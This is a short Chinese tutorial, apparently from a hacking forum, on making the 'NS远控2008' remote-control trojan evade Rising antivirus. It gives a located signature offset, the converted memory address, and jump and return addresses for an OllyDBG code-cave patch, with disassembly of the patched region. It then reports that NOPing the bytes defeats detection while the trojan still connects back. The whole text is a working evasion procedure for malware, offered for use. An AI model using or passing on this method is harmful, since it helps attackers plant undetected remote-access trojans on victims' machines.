NS远控2008跳转法免杀过瑞星

教程工具：OllyDBG 偏移量转换器

好，我们现在开始

首先生成一个默认木马，查杀一下，最新的病毒库，被杀了，下面开始免杀。

这是我事先定位好的特征码：0000D7F3_00000002

用 偏移量转换器 转换成内存地址：1314E3F3

将木马载入OllyDBG

原地址：1314E3F3

跳转地址：1314D626

跳回地址：1314E3FA

1314E3F3 . 33C0 XOR EAX,EAX
1314E3F5 . E8 7E43FFFF CALL AAWF.13142778
1314E3FA . 8B55 EC MOV EDX,DWORD PTR SS:[EBP-14]
1314E3FD . B8 D4E51413 MOV EAX,AAWF.1314E5D4 ; ASCII "netservice"

1314D626 . 6A 00 PUSH 0 ; /DisplayName = NULL
1314D628 . 6A 00 PUSH 0 ; |Password = NULL
1314D62A . 6A 00 PUSH 0 ; |ServiceStartName = NULL
1314D62C . 6A 00 PUSH 0 ; |pDependencies = NULL
1314D62E . 6A 00 PUSH 0 ; |pTagId = NULL
1314D630 . 6A 00 PUSH 0 ; |LoadOrderGroup = NULL

具体看我操作吧 NOP掉 查下一下 呵呵 不杀了 看看是否可以上线 正常 可以上线